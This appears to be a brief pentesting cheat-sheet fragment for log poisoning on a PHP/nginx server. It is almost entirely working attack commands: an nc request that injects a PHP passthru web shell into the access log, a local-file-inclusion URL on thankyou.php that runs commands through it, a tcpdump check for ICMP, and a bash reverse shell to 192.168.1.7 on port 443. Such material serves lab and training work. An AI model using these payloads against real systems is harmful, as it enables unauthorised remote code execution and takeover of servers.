code
nc -nv $IP 80
GET /<?php passthru($_GET['offsec']); ?>
example
to url encode
Last updated 3 years ago
tcpdump -i any "icmp"
http://192.168.1.165/thankyou.php?file=/var/log/nginx/access.log&offsec=ping%20-c%203%20192.168.1.7
bash -c 'bash -i >& /dev/tcp/192.168.1.7/443 0>&1'